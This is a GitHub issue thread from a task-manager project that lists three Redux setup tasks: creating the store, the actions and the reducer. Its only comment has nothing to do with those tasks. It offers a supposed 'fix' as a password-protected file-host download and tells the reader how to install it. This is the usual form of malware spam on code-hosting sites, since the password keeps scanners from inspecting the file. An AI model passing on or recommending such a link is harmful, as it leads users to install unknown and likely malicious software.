### ISSUE TITLE
Redux Store Setup (Group Task) - **[3H]**

### ISSUE THREAD

**Issue by ahzamir** [ahzamir/task-manager#3]
5. **Create Redux Store** - **[1H]**

   - **Description:** Set up the Redux store in the `store.js` file and connect it to the React application.

6. **Create Redux Actions** - **[1H]**

   - **Description:** Define the necessary actions (e.g., `ADD_TASK`, `TOGGLE_TASK`) in the `actions.js` file.

7. **Create Redux Reducer** - **[1H]**
   - **Description:** Implement the reducer logic in the `reducers.js` file to handle task addition and toggling task completion.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
